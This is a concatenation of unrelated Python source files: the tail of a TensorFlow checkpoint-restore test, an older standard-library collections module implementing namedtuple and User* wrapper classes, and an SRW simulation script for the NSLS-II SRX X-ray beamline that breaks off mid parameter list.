testMissingVariablesDict(self): init_value0 = 10.0 init_value1 = 20.0 var_names_to_values = {'v0': init_value0, 'v1': init_value1} model_dir = os.path.join(self.get_temp_dir(), 'model') with self.test_session() as sess: model_path = self.create_checkpoint_from_values(var_names_to_values, model_dir) var0 = tf.contrib.framework.variable('my_var0', shape=[]) var1 = tf.contrib.framework.variable('my_var1', shape=[]) var2 = tf.contrib.framework.variable('my_var2', shape=[]) vars_to_restore = {'v0': var0, 'v1': var1, 'v2': var2} init_fn = tf.contrib.framework.assign_from_checkpoint_fn( model_path, vars_to_restore, ignore_missing_vars=True) # Initialize the variables. sess.run(tf.initialize_all_variables()) # Perform the assignment. init_fn(sess) # Request and test the variable values: self.assertEqual(init_value0, var0.eval()) self.assertEqual(init_value1, var1.eval()) if __name__ == '__main__': tf.test.main()
__all__ = ['deque', 'defaultdict', 'namedtuple', 'UserDict', 'UserList', 'UserString'] # For bootstrapping reasons, the collection ABCs are defined in _abcoll.py. # They should however be considered an integral part of collections.py. from _abcoll import * import _abcoll __all__ += _abcoll.__all__ from _collections import deque, defaultdict from operator import itemgetter as _itemgetter from keyword import iskeyword as _iskeyword import sys as _sys ################################################################################ ### namedtuple ################################################################################ def namedtuple(typename, field_names, verbose=False): """Returns a new subclass of tuple with named fields. >>> Point = namedtuple('Point', 'x y') >>> Point.__doc__ # docstring for the new class 'Point(x, y)' >>> p = Point(11, y=22) # instantiate with positional args or keywords >>> p[0] + p[1] # indexable like a plain tuple 33 >>> x, y = p # unpack like a regular tuple >>> x, y (11, 22) >>> p.x + p.y # fields also accessable by name 33 >>> d = p._asdict() # convert to a dictionary >>> d['x'] 11 >>> Point(**d) # convert from a dictionary Point(x=11, y=22) >>> p._replace(x=100) # _replace() is like str.replace() but targets named fields Point(x=100, y=22) """ # Parse and validate the field names. Validation serves two purposes, # generating informative error messages and preventing template injection attacks. if isinstance(field_names, str): field_names = field_names.replace(',', ' ').split() # names separated by whitespace and/or commas field_names = tuple(map(str, field_names)) for name in (typename,) + field_names: if not all(c.isalnum() or c=='_' for c in name): raise ValueError('Type names and field names can only contain alphanumeric characters and underscores: %r' % name) if _iskeyword(name): raise ValueError('Type names and field names cannot be a keyword: %r' % name) if name[0].isdigit(): raise ValueError('Type names and field names cannot start with a number: %r' % name) seen_names = set() for name in field_names: if name.startswith('_'): raise ValueError('Field names cannot start with an underscore: %r' % name) if name in seen_names: raise ValueError('Encountered duplicate field name: %r' % name) seen_names.add(name) # Create and fill-in the class template numfields = len(field_names) argtxt = repr(field_names).replace("'", "")[1:-1] # tuple repr without parens or quotes reprtxt = ', '.join('%s=%%r' % name for name in field_names) dicttxt = ', '.join('%r: t[%d]' % (name, pos) for pos, name in enumerate(field_names)) template = '''class %(typename)s(tuple): '%(typename)s(%(argtxt)s)' \n __slots__ = () \n _fields = %(field_names)r \n def __new__(cls, %(argtxt)s): return tuple.__new__(cls, (%(argtxt)s)) \n @classmethod def _make(cls, iterable, new=tuple.__new__, len=len): 'Make a new %(typename)s object from a sequence or iterable' result = new(cls, iterable) if len(result) != %(numfields)d: raise TypeError('Expected %(numfields)d arguments, got %%d' %% len(result)) return result \n def __repr__(self): return '%(typename)s(%(reprtxt)s)' %% self \n def _asdict(t): 'Return a new dict which maps field names to their values' return {%(dicttxt)s} \n def _replace(self, **kwds): 'Return a new %(typename)s object replacing specified fields with new values' result = self._make(map(kwds.pop, %(field_names)r, self)) if kwds: raise ValueError('Got unexpected field names: %%r' %% kwds.keys()) return result \n def __getnewargs__(self): return tuple(self) \n\n''' % locals() for i, name in enumerate(field_names): template += ' %s = property(itemgetter(%d))\n' % (name, i) if verbose: print(template) # Execute the template string in a temporary namespace and # support tracing utilities by setting a value for frame.f_globals['__name__'] namespace = dict(itemgetter=_itemgetter, __name__='namedtuple_%s' % typename) try: exec(template, namespace) except SyntaxError as e: raise SyntaxError(e.msg + ':\n' + template) from e result = namespace[typename] # For pickling to work, the __module__ variable needs to be set to the frame # where the named tuple is created. Bypass this step in enviroments where # sys._getframe is not defined (Jython for example). if hasattr(_sys, '_getframe'): result.__module__ = _sys._getframe(1).f_globals['__name__'] return result ################################################################################ ### UserDict ################################################################################ class UserDict(MutableMapping): # Start by filling-out the abstract methods def __init__(self, dict=None, **kwargs): self.data = {} if dict is not None: self.update(dict) if len(kwargs): self.update(kwargs) def __len__(self): return len(self.data) def __getitem__(self, key): if key in self.data: return self.data[key] if hasattr(self.__class__, "__missing__"): return self.__class__.__missing__(self, key) raise KeyError(key) def __setitem__(self, key, item): self.data[key] = item def __delitem__(self, key): del self.data[key] def __iter__(self): return iter(self.data) # Modify __contains__ to work correctly when __missing__ is present def __contains__(self, key): return key in self.data # Now, add the methods in dicts but not in MutableMapping def __repr__(self): return repr(self.data) def copy(self): if self.__class__ is UserDict: return UserDict(self.data.copy()) import copy data = self.data try: self.data = {} c = copy.copy(self) finally: self.data = data c.update(self) return c @classmethod def fromkeys(cls, iterable, value=None): d = cls() for key in iterable: d[key] = value return d ################################################################################ ### UserList ################################################################################ class UserList(MutableSequence): """A more or less complete user-defined wrapper around list objects.""" def __init__(self, initlist=None): self.data = [] if initlist is not None: # XXX should this accept an arbitrary sequence? if type(initlist) == type(self.data): self.data[:] = initlist elif isinstance(initlist, UserList): self.data[:] = initlist.data[:] else: self.data = list(initlist) def __repr__(self): return repr(self.data) def __lt__(self, other): return self.data < self.__cast(other) def __le__(self, other): return self.data <= self.__cast(other) def __eq__(self, other): return self.data == self.__cast(other) def __ne__(self, other): return self.data != self.__cast(other) def __gt__(self, other): return self.data > self.__cast(other) def __ge__(self, other): return self.data >= self.__cast(other) def __cast(self, other): return other.data if isinstance(other, UserList) else other def __cmp__(self, other): return cmp(self.data, self.__cast(other)) def __contains__(self, item): return item in self.data def __len__(self): return len(self.data) def __getitem__(self, i): return self.data[i] def __setitem__(self, i, item): self.data[i] = item def __delitem__(self, i): del self.data[i] def __add__(self, other): if isinstance(other, UserList): return self.__class__(self.data + other.data) elif isinstance(other, type(self.data)): return self.__class__(self.data + other) return self.__class__(self.data + list(other)) def __radd__(self, other): if isinstance(other, UserList): return self.__class__(other.data + self.data) elif isinstance(other, type(self.data)): return self.__class__(other + self.data) return self.__class__(list(other) + self.data) def __iadd__(self, other): if isinstance(other, UserList): self.data += other.data elif isinstance(other, type(self.data)): self.data += other else: self.data += list(other) return self def __mul__(self, n): return self.__class__(self.data*n) __rmul__ = __mul__ def __imul__(self, n): self.data *= n return self def append(self, item): self.data.append(item) def insert(self, i, item): self.data.insert(i, item) def pop(self, i=-1): return self.data.pop(i) def remove(self, item): self.data.remove(item) def count(self, item): return self.data.count(item) def index(self, item, *args): return self.data.index(item, *args) def reverse(self): self.data.reverse() def sort(self, *args, **kwds): self.data.sort(*args, **kwds) def extend(self, other): if isinstance(other, UserList): self.data.extend(other.data) else: self.data.extend(other) ################################################################################ ### UserString ################################################################################ class UserString(Sequence): def __init__(self, seq): if isinstance(seq, str): self.data = seq elif isinstance(seq, UserString): self.data = seq.data[:] else: self.data = str(seq) def __str__(self): return str(self.data) def __repr__(self): return repr(self.data) def __int__(self): return int(self.data) def __long__(self): return int(self.data) def __float__(self): return float(self.data) def __complex__(self): return complex(self.data) def __hash__(self): return hash(self.data) def __eq__(self, string): if isinstance(string, UserString): return self.data == string.data return self.data == string def __ne__(self, string): if isinstance(string, UserString): return self.data != string.data return self.data != string def __lt__(self, string): if isinstance(string, UserString): return self.data < string.data return self.data < string def __le__(self, string): if isinstance(string, UserString): return self.data <= string.data return self.data <= string def __gt__(self, string): if isinstance(string, UserString): return self.data > string.data return self.data > string def __ge__(self, string): if isinstance(string, UserString): return self.data >= string.data return self.data >= string def __contains__(self, char): if isinstance(char, UserString): char = char.data return char in self.data def __len__(self): return len(self.data) def __getitem__(self, index): return self.__class__(self.data[index]) def __add__(self, other): if isinstance(other, UserString): return self.__class__(self.data + other.data) elif isinstance(other, str): return self.__class__(self.data + other) return self.__class__(self.data + str(other)) def __radd__(self, other): if isinstance(other, str): return self.__class__(other + self.data) return self.__class__(str(other) + self.data) def __mul__(self, n): return self.__class__(self.data*n) __rmul__ = __mul__ def __mod__(self, args): return self.__class__(self.data % args) # the following methods are defined in alphabetical order: def capitalize(self): return self.__class__(self.data.capitalize()) def center(self, width, *args): return self.__class__(self.data.center(width, *args)) def count(self, sub, start=0, end=_sys.maxsize): if isinstance(sub, UserString): sub = sub.data return self.data.count(sub, start, end) def encode(self, encoding=None, errors=None): # XXX improve this? if encoding: if errors: return self.__class__(self.data.encode(encoding, errors)) return self.__class__(self.data.encode(encoding)) return self.__class__(self.data.encode()) def endswith(self, suffix, start=0, end=_sys.maxsize): return self.data.endswith(suffix, start, end) def expandtabs(self, tabsize=8): return self.__class__(self.data.expandtabs(tabsize)) def find(self, sub, start=0, end=_sys.maxsize): if isinstance(sub, UserString): sub = sub.data return self.data.find(sub, start, end) def format(self, *args, **kwds): return self.data.format(*args, **kwds) def index(self, sub, start=0, end=_sys.maxsize): return self.data.index(sub, start, end) def isalpha(self): return self.data.isalpha() def isalnum(self): return self.data.isalnum() def isdecimal(self): return self.data.isdecimal() def isdigit(self): return self.data.isdigit() def isidentifier(self): return self.data.isidentifier() def islower(self): return self.data.islower() def isnumeric(self): return self.data.isnumeric() def isspace(self): return self.data.isspace() def istitle(self): return self.data.istitle() def isupper(self): return self.data.isupper() def join(self, seq): return self.data.join(seq) def ljust(self, width, *args): return self.__class__(self.data.ljust(width, *args)) def lower(self): return self.__class__(self.data.lower()) def lstrip(self, chars=None): return self.__class__(self.data.lstrip(chars)) def partition(self, sep): return self.data.partition(sep) def replace(self, old, new, maxsplit=-1): if isinstance(old, UserString): old = old.data if isinstance(new, UserString): new = new.data return self.__class__(self.data.replace(old, new, maxsplit)) def rfind(self, sub, start=0, end=_sys.maxsize): return self.data.rfind(sub, start, end) def rindex(self, sub, start=0, end=_sys.maxsize): return self.data.rindex(sub, start, end) def rjust(self, width, *args): return self.__class__(self.data.rjust(width, *args)) def rpartition(self, sep): return self.data.rpartition(sep) def rstrip(self, chars=None): return self.__class__(self.data.rstrip(chars)) def split(self, sep=None, maxsplit=-1): return self.data.split(sep, maxsplit) def rsplit(self, sep=None, maxsplit=-1): return self.data.rsplit(sep, maxsplit) def splitlines(self, keepends=0): return self.data.splitlines(keepends) def startswith(self, prefix, start=0, end=_sys.maxsize): return self.data.startswith(prefix, start, end) def strip(self, chars=None): return self.__class__(self.data.strip(chars)) def swapcase(self): return self.__class__(self.data.swapcase()) def title(self): return self.__class__(self.data.title()) def translate(self, *args): return self.__class__(self.data.translate(*args)) def upper(self): return self.__class__(self.data.upper()) def zfill(self, width): return self.__class__(self.data.zfill(width)) ################################################################################ ### Simple tests ################################################################################ if __name__ == '__main__': # verify that instances can be pickled from pickle import loads, dumps Point = namedtuple('Point', 'x, y', True) p = Point(x=10, y=20) assert p == loads(dumps(p)) # test and demonstrate ability to override methods class Point(namedtuple('Point', 'x y')): __slots__ = () @property def hypot(self): return (self.x ** 2 + self.y ** 2) ** 0.5 def __str__(self): return 'Point: x=%6.3f y=%6.3f hypot=%6.3f' % (self.x, self.y, self.hypot) for p in Point(3, 4), Point(14, 5/7.): print (p) class Point(namedtuple('Point', 'x y')): 'Point class with optimized _make() and _replace() without error-checking' __slots__ = () _make = classmethod(tuple.__new__) def _replace(self, _map=map, **kwds): return self._make(_map(kwds.get, ('x', 'y'), self)) print(Point(11, 22)._replace(x=100)) Point3D = namedtuple('Point3D', Point._fields + ('z',)) print(Point3D.__doc__) import doctest TestResults = namedtuple('TestResults', 'failed attempted') print(TestResults(*doctest.testmod()))
#!/usr/bin/env python import os try: __IPYTHON__ import sys del sys.argv[1:] except: pass import srwl_bl import srwlib import srwlpy import srwl_uti_smp def set_optics(v=None): el = [] pp = [] names = ['S0', 'S0_HFM', 'HFM', 'HFM_S1', 'S1', 'S1_DCM_C1', 'DCM_C1', 'DCM_C2', 'DCM_C2_At_BPM1', 'At_BPM1', 'At_BPM1_Before_SSA', 'Before_SSA', 'SSA', 'SSA_AKB', 'AKB', 'AKB_KBV', 'KBV', 'KBV_KBH', 'KBH', 'KBH_At_Sample', 'At_Sample'] for el_name in names: if el_name == 'S0': # S0: aperture 33.1798m el.append(srwlib.SRWLOptA( _shape=v.op_S0_shape, _ap_or_ob='a', _Dx=v.op_S0_Dx, _Dy=v.op_S0_Dy, _x=v.op_S0_x, _y=v.op_S0_y, )) pp.append(v.op_S0_pp) elif el_name == 'S0_HFM': # S0_HFM: drift 33.1798m el.append(srwlib.SRWLOptD( _L=v.op_S0_HFM_L, )) pp.append(v.op_S0_HFM_pp) elif el_name == 'HFM': # HFM: sphericalMirror 34.2608m el.append(srwlib.SRWLOptMirSph( _r=v.op_HFM_r, _size_tang=v.op_HFM_size_tang, _size_sag=v.op_HFM_size_sag, _nvx=v.op_HFM_nvx, _nvy=v.op_HFM_nvy, _nvz=v.op_HFM_nvz, _tvx=v.op_HFM_tvx, _tvy=v.op_HFM_tvy, _x=v.op_HFM_x, _y=v.op_HFM_y, )) pp.append(v.op_HFM_pp) elif el_name == 'HFM_S1': # HFM_S1: drift 34.2608m el.append(srwlib.SRWLOptD( _L=v.op_HFM_S1_L, )) pp.append(v.op_HFM_S1_pp) elif el_name == 'S1': # S1: aperture 35.6678m el.append(srwlib.SRWLOptA( _shape=v.op_S1_shape, _ap_or_ob='a', _Dx=v.op_S1_Dx, _Dy=v.op_S1_Dy, _x=v.op_S1_x, _y=v.op_S1_y, )) pp.append(v.op_S1_pp) elif el_name == 'S1_DCM_C1': # S1_DCM_C1: drift 35.6678m el.append(srwlib.SRWLOptD( _L=v.op_S1_DCM_C1_L, )) pp.append(v.op_S1_DCM_C1_pp) elif el_name == 'DCM_C1': # DCM_C1: crystal 36.4488m crystal = srwlib.SRWLOptCryst( _d_sp=v.op_DCM_C1_d_sp, _psi0r=v.op_DCM_C1_psi0r, _psi0i=v.op_DCM_C1_psi0i, _psi_hr=v.op_DCM_C1_psiHr, _psi_hi=v.op_DCM_C1_psiHi, _psi_hbr=v.op_DCM_C1_psiHBr, _psi_hbi=v.op_DCM_C1_psiHBi, _tc=v.op_DCM_C1_tc, _ang_as=v.op_DCM_C1_ang_as, ) crystal.set_orient( _nvx=v.op_DCM_C1_nvx, _nvy=v.op_DCM_C1_nvy, _nvz=v.op_DCM_C1_nvz, _tvx=v.op_DCM_C1_tvx, _tvy=v.op_DCM_C1_tvy, ) el.append(crystal) pp.append(v.op_DCM_C1_pp) elif el_name == 'DCM_C2': # DCM_C2: crystal 36.4488m crystal = srwlib.SRWLOptCryst( _d_sp=v.op_DCM_C2_d_sp, _psi0r=v.op_DCM_C2_psi0r, _psi0i=v.op_DCM_C2_psi0i, _psi_hr=v.op_DCM_C2_psiHr, _psi_hi=v.op_DCM_C2_psiHi, _psi_hbr=v.op_DCM_C2_psiHBr, _psi_hbi=v.op_DCM_C2_psiHBi, _tc=v.op_DCM_C2_tc, _ang_as=v.op_DCM_C2_ang_as, ) crystal.set_orient( _nvx=v.op_DCM_C2_nvx, _nvy=v.op_DCM_C2_nvy, _nvz=v.op_DCM_C2_nvz, _tvx=v.op_DCM_C2_tvx, _tvy=v.op_DCM_C2_tvy, ) el.append(crystal) pp.append(v.op_DCM_C2_pp) elif el_name == 'DCM_C2_At_BPM1': # DCM_C2_At_BPM1: drift 36.4488m el.append(srwlib.SRWLOptD( _L=v.op_DCM_C2_At_BPM1_L, )) pp.append(v.op_DCM_C2_At_BPM1_pp) elif el_name == 'At_BPM1': # At_BPM1: watch 38.6904m pass elif el_name == 'At_BPM1_Before_SSA': # At_BPM1_Before_SSA: drift 38.6904m el.append(srwlib.SRWLOptD( _L=v.op_At_BPM1_Before_SSA_L, )) pp.append(v.op_At_BPM1_Before_SSA_pp) elif el_name == 'Before_SSA': # Before_SSA: watch 50.6572m pass elif el_name == 'SSA': # SSA: aperture 50.6572m el.append(srwlib.SRWLOptA( _shape=v.op_SSA_shape, _ap_or_ob='a', _Dx=v.op_SSA_Dx, _Dy=v.op_SSA_Dy, _x=v.op_SSA_x, _y=v.op_SSA_y, )) pp.append(v.op_SSA_pp) elif el_name == 'SSA_AKB': # SSA_AKB: drift 50.6572m el.append(srwlib.SRWLOptD( _L=v.op_SSA_AKB_L, )) pp.append(v.op_SSA_AKB_pp) elif el_name == 'AKB': # AKB: aperture 62.488m el.append(srwlib.SRWLOptA( _shape=v.op_AKB_shape, _ap_or_ob='a', _Dx=v.op_AKB_Dx, _Dy=v.op_AKB_Dy, _x=v.op_AKB_x, _y=v.op_AKB_y, )) pp.append(v.op_AKB_pp) elif el_name == 'AKB_KBV': # AKB_KBV: drift 62.488m el.append(srwlib.SRWLOptD( _L=v.op_AKB_KBV_L, )) pp.append(v.op_AKB_KBV_pp) elif el_name == 'KBV': # KBV: ellipsoidMirror 62.663m el.append(srwlib.SRWLOptMirEl( _p=v.op_KBV_p, _q=v.op_KBV_q, _ang_graz=v.op_KBV_ang, _size_tang=v.op_KBV_size_tang, _size_sag=v.op_KBV_size_sag, _nvx=v.op_KBV_nvx, _nvy=v.op_KBV_nvy, _nvz=v.op_KBV_nvz, _tvx=v.op_KBV_tvx, _tvy=v.op_KBV_tvy, _x=v.op_KBV_x, _y=v.op_KBV_y, )) pp.append(v.op_KBV_pp) elif el_name == 'KBV_KBH': # KBV_KBH: drift 62.663m el.append(srwlib.SRWLOptD( _L=v.op_KBV_KBH_L, )) pp.append(v.op_KBV_KBH_pp) elif el_name == 'KBH': # KBH: ellipsoidMirror 63.0m el.append(srwlib.SRWLOptMirEl( _p=v.op_KBH_p, _q=v.op_KBH_q, _ang_graz=v.op_KBH_ang, _size_tang=v.op_KBH_size_tang, _size_sag=v.op_KBH_size_sag, _nvx=v.op_KBH_nvx, _nvy=v.op_KBH_nvy, _nvz=v.op_KBH_nvz, _tvx=v.op_KBH_tvx, _tvy=v.op_KBH_tvy, _x=v.op_KBH_x, _y=v.op_KBH_y, )) pp.append(v.op_KBH_pp) elif el_name == 'KBH_At_Sample': # KBH_At_Sample: drift 63.0m el.append(srwlib.SRWLOptD( _L=v.op_KBH_At_Sample_L, )) pp.append(v.op_KBH_At_Sample_pp) elif el_name == 'At_Sample': # At_Sample: watch 63.3m pass pp.append(v.op_fin_pp) return srwlib.SRWLOptC(el, pp) varParam = srwl_bl.srwl_uti_ext_options([ ['name', 's', 'NSLS-II SRX beamline', 'simulation name'], #---Data Folder ['fdir', 's', '', 'folder (directory) name for reading-in input and saving output data files'], #---Electron Beam ['ebm_nm', 's', '', 'standard electron beam name'], ['ebm_nms', 's', '', 'standard electron beam name suffix: e.g. can be Day1, Final'], ['ebm_i', 'f', 0.5, 'electron beam current [A]'], ['ebm_e', 'f', 3.0, 'electron beam avarage energy [GeV]'], ['ebm_de', 'f', 0.0, 'electron beam average energy deviation [GeV]'], ['ebm_x', 'f', 0.0, 'electron beam initial average horizontal position [m]'], ['ebm_y', 'f', 0.0, 'electron beam initial average vertical position [m]'], ['ebm_xp', 'f', 0.0, 'electron beam initial average horizontal angle [rad]'], ['ebm_yp', 'f', 0.0, 'electron beam initial average vertical angle [rad]'], ['ebm_z', 'f', 0., 'electron beam initial average longitudinal position [m]'], ['ebm_dr', 'f', 0.0, 'electron beam longitudinal drift [m] to be performed before a required calculation'], ['ebm_ens', 'f', 0.00089, 'electron beam relative energy spread'], ['ebm_emx', 'f', 9e-10, 'electron beam horizontal emittance [m]'], ['ebm_emy', 'f', 8e-12, 'electron beam vertical emittance [m]'], # Definition of the beam through Twiss: ['ebm_betax', 'f', 1.84, 'horizontal beta-function [m]'], ['ebm_betay', 'f', 1.17, 'vertical beta-function [m]'], ['ebm_alphax', 'f', 0.0, 'horizontal alpha-function [rad]'], ['ebm_alphay', 'f', 0.0, 'vertical alpha-function [rad]'], ['ebm_etax', 'f', 0.0, 'horizontal dispersion function [m]'], ['ebm_etay', 'f', 0.0, 'vertical dispersion function [m]'], ['ebm_etaxp', 'f', 0.0, 'horizontal dispersion function derivative [rad]'], ['ebm_etayp', 'f', 0.0, 'vertical dispersion function derivative [rad]'], #---Undulator ['und_bx', 'f', 0.0, 'undulator horizontal peak magnetic field [T]'], ['und_by', 'f', 0.88770981, 'undulator vertical peak magnetic field [T]'], ['und_phx', 'f', 0.0, 'initial phase of the horizontal magnetic field [rad]'], ['und_phy', 'f', 0.0, 'initial phase of the vertical magnetic field [rad]'], ['und_b2e', '', '', 'estimate undulator fundamental photon energy (in [eV]) for the amplitude of sinusoidal magnetic field defined by und_b or und_bx, und_by', 'store_true'], ['und_e2b', '', '', 'estimate undulator field amplitude (in [T]) for the photon energy defined by w_e', 'store_true'], ['und_per', 'f', 0.02, 'undulator period [m]'], ['und_len', 'f', 2.500648, 'undulator length [m]'], ['und_zc', 'f', -1.25, 'undulator center longitudinal position [m]'], ['und_sx', 'i', 1, 'undulator horizontal magnetic field symmetry vs longitudinal position'], ['und_sy', 'i', -1, 'undulator vertical magnetic field symmetry vs longitudinal position'], ['und_g', 'f', 6.715, 'undulator gap [mm] (assumes availability of magnetic measurement or simulation data)'], ['und_ph', 'f', 0.0, 'shift of magnet arrays [mm] for which the field should be set up'], ['und_mdir', 's', '', 'name of magnetic measurements sub-folder'], ['und_mfs', 's', '', 'name of magnetic measurements for different gaps summary file'], #---Calculation Types # Electron Trajectory ['tr', '', '', 'calculate electron trajectory', 'store_true'], ['tr_cti', 'f', 0.0, 'initial time moment (c*t) for electron trajectory calculation [m]'], ['tr_ctf', 'f', 0.0, 'final time moment (c*t) for electron trajectory calculation [m]'], ['tr_np', 'f', 10000, 'number of points for trajectory calculation'], ['tr_mag', 'i', 2, 'magnetic field to be used for trajectory calculation: 1- approximate, 2- accurate'], ['tr_fn', 's', 'res_trj.dat', 'file name for saving calculated trajectory data'], ['tr_pl', 's', '', 'plot the resulting trajectiry in graph(s): ""- dont plot, otherwise the string should list the trajectory components to plot'], #Single-Electron Spectrum vs Photon Energy ['ss', '', '', 'calculate single-e spectrum vs photon energy', 'store_true'], ['ss_ei', 'f', 100.0, 'initial photon energy [eV] for single-e spectrum vs photon energy calculation'], ['ss_ef', 'f', 20000.0, 'final photon energy [eV] for single-e spectrum vs photon energy calculation'], ['ss_ne', 'i', 10000, 'number of points vs photon energy for single-e spectrum vs photon energy calculation'], ['ss_x', 'f', 0.0, 'horizontal position [m] for single-e spectrum vs photon energy calculation'], ['ss_y', 'f', 0.0, 'vertical position [m] for single-e spectrum vs photon energy calculation'], ['ss_meth', 'i', 1, 'method to use for single-e spectrum vs photon energy calculation: 0- "manual", 1- "auto-undulator", 2- "auto-wiggler"'], ['ss_prec', 'f', 0.01, 'relative precision for single-e spectrum vs photon energy calculation (nominal value is 0.01)'], ['ss_pol', 'i', 6, 'polarization component to extract after spectrum vs photon energy calculation: 0- Linear Horizontal, 1- Linear Vertical, 2- Linear 45 degrees, 3- Linear 135 degrees, 4- Circular Right, 5- Circular Left, 6- Total'], ['ss_mag', 'i', 2, 'magnetic field to be used for single-e spectrum vs photon energy calculation: 1- approximate, 2- accurate'], ['ss_ft', 's', 'f', 'presentation/domain: "f"- frequency (photon energy), "t"- time'], ['ss_u', 'i', 1, 'electric field units: 0- arbitrary, 1- sqrt(Phot/s/0.1%bw/mm^2), 2- sqrt(J/eV/mm^2) or sqrt(W/mm^2), depending on representation (freq. or time)'], ['ss_fn', 's', 'res_spec_se.dat', 'file name for saving calculated single-e spectrum vs photon energy'], ['ss_pl', 's', '', 'plot the resulting single-e spectrum in a graph: ""- dont plot, "e"- show plot vs photon energy'], #Multi-Electron Spectrum vs Photon Energy (taking into account e-beam emittance, energy spread and collection aperture size) ['sm', '', '', 'calculate multi-e spectrum vs photon energy', 'store_true'], ['sm_ei', 'f', 100.0, 'initial photon energy [eV] for multi-e spectrum vs photon energy calculation'], ['sm_ef', 'f', 20000.0, 'final photon energy [eV] for multi-e spectrum vs photon energy calculation'], ['sm_ne', 'i', 10000, 'number of points vs photon energy for multi-e spectrum vs photon energy calculation'], ['sm_x', 'f', 0.0, 'horizontal center position [m] for multi-e spectrum vs photon energy calculation'], ['sm_rx', 'f', 0.001, 'range of horizontal position / horizontal aperture size [m] for multi-e spectrum vs photon energy calculation'], ['sm_nx', 'i', 1, 'number of points vs horizontal position for multi-e spectrum vs photon energy calculation'], ['sm_y', 'f', 0.0, 'vertical center position [m] for multi-e spectrum vs photon energy calculation'], ['sm_ry', 'f', 0.001, 'range of vertical position / vertical aperture size [m] for multi-e spectrum vs photon energy calculation'], ['sm_ny', 'i', 1, 'number of points vs vertical position for multi-e spectrum vs photon energy calculation'], ['sm_mag', 'i', 1, 'magnetic field to be used for calculation of multi-e spectrum spectrum or intensity distribution: 1- approximate, 2- accurate'], ['sm_hi', 'i', 1, 'initial UR spectral harmonic to be taken into account for multi-e spectrum vs photon energy calculation'], ['sm_hf', 'i', 15, 'final UR spectral harmonic to be taken into account for multi-e spectrum vs photon energy calculation'], ['sm_prl', 'f', 1.0, 'longitudinal integration precision parameter for multi-e spectrum vs photon energy calculation'], ['sm_pra', 'f', 1.0, 'azimuthal integration precision parameter for multi-e spectrum vs photon energy calculation'], ['sm_meth', 'i', -1, 'method to use for spectrum vs photon energy calculation in case of arbitrary input magnetic field: 0- "manual", 1- "auto-undulator", 2- "auto-wiggler", -1- dont use this accurate integration method (rather use approximate if possible)'], ['sm_prec', 'f', 0.01, 'relative precision for spectrum vs photon energy calculation in case of arbitrary input magnetic field (nominal value is 0.01)'], ['sm_nm', 'i', 1, 'number of macro-electrons for calculation of spectrum in case of arbitrary input magnetic field'], ['sm_na', 'i', 5, 'number of macro-electrons to average on each node at parallel (MPI-based) calculation of spectrum in case of arbitrary input magnetic field'], ['sm_ns', 'i', 5, 'saving periodicity (in terms of macro-electrons) for intermediate intensity at calculation of multi-electron spectrum in case of arbitrary input magnetic field'], ['sm_type', 'i', 1, 'calculate flux (=1) or flux per unit surface (=2)'], ['sm_pol', 'i', 6, 'polarization component to extract after calculation of multi-e flux or intensity: 0- Linear Horizontal, 1- Linear Vertical, 2- Linear 45 degrees, 3- Linear 135 degrees, 4- Circular Right, 5- Circular Left, 6- Total'], ['sm_rm', 'i', 1, 'method for generation of pseudo-random numbers for e-beam phase-space integration: 1- standard pseudo-random number generator, 2- Halton sequences, 3- LPtau sequences (to be implemented)'], ['sm_fn', 's', 'res_spec_me.dat', 'file name for saving calculated milti-e spectrum vs photon energy'], ['sm_pl', 's', '', 'plot the resulting spectrum-e spectrum in a graph: ""- dont plot, "e"- show plot vs photon energy'], #to add options for the multi-e calculation from "accurate" magnetic field #Power Density Distribution vs horizontal and vertical position ['pw', '', '', 'calculate SR power density distribution', 'store_true'], ['pw_x', 'f', 0.0, 'central horizontal position [m] for calculation of power density distribution vs horizontal and vertical position'], ['pw_rx', 'f', 0.025, 'range of horizontal position [m] for calculation of power density distribution vs horizontal and vertical position'], ['pw_nx', 'i', 100, 'number of points vs horizontal position for calculation of power density distribution'], ['pw_y', 'f', 0.0, 'central vertical position [m] for calculation of power density distribution vs horizontal and vertical position'], ['pw_ry', 'f', 0.025, 'range of vertical position [m] for calculation of power density distribution vs horizontal and vertical position'], ['pw_ny', 'i', 100, 'number of points vs vertical position for calculation of power density distribution'], ['pw_pr', 'f', 1.0, 'precision factor for calculation of power density distribution'], ['pw_meth', 'i', 1, 'power density computation method (1- "near field", 2- "far field")'], ['pw_zst', 'f', 0., 'initial longitudinal position along electron trajectory of power density distribution (effective if pow_sst < pow_sfi)'], ['pw_zfi', 'f', 0., 'final longitudinal position along electron trajectory of power density distribution (effective if pow_sst < pow_sfi)'], ['pw_mag', 'i', 2, 'magnetic field to be used for power density calculation: 1- approximate, 2- accurate'], ['pw_fn', 's', 'res_pow.dat', 'file name for saving calculated power density distribution'], ['pw_pl', 's', '', 'plot the resulting power density distribution in a graph: ""- dont plot, "x"- vs horizontal position, "y"- vs vertical position, "xy"- vs horizontal and vertical position'], #Single-Electron Intensity distribution vs horizontal and vertical position ['si', '', '', 'calculate single-e intensity distribution (without wavefront propagation through a beamline) vs horizontal and vertical position', 'store_true'], #Single-Electron Wavefront Propagation ['ws', '', '', 'calculate single-electron (/ fully coherent) wavefront propagation', 'store_true'], #Multi-Electron (partially-coherent) Wavefront Propagation ['wm', '', '', 'calculate multi-electron (/ partially coherent) wavefront propagation', 'store_true'], ['w_e', 'f', 8000.0, 'photon energy [eV] for calculation of intensity distribution vs horizontal and vertical position'], ['w_ef', 'f', -1.0, 'final photon energy [eV] for calculation of intensity distribution vs horizontal and vertical position'], ['w_ne', 'i', 1, 'number of points vs photon energy for calculation of intensity distribution'], ['w_x', 'f', 0.0, 'central horizontal position [m] for calculation of intensity distribution'], ['w_rx', 'f', 0.0025, 'range of horizontal position [m] for calculation of intensity distribution'], ['w_nx', 'i', 100, 'number of points vs horizontal position for calculation of intensity distribution'], ['w_y', 'f', 0.0, 'central vertical position [m] for calculation of intensity distribution vs horizontal and vertical position'], ['w_ry', 'f', 0.0013, 'range of vertical position [m] for calculation of intensity distribution vs horizontal and vertical position'], ['w_ny', 'i', 100, 'number of points vs vertical position for calculation of intensity distribution'], ['w_smpf', 'f', 0.1, 'sampling factor for calculation of intensity distribution vs horizontal and vertical position'], ['w_meth', 'i', 1, 'method to use for calculation of intensity distribution vs horizontal and vertical position: 0- "manual", 1- "auto-undulator", 2- "auto-wiggler"'], ['w_prec', 'f', 0.01, 'relative precision for calculation of intensity distribution vs horizontal and vertical position'], ['w_u', 'i', 1, 'electric field units: 0- arbitrary, 1- sqrt(Phot/s/0.1%bw/mm^2), 2- sqrt(J/eV/mm^2) or sqrt(W/mm^2), depending on representation (freq. or time)'], ['si_pol', 'i', 6, 'polarization component to extract after calculation of 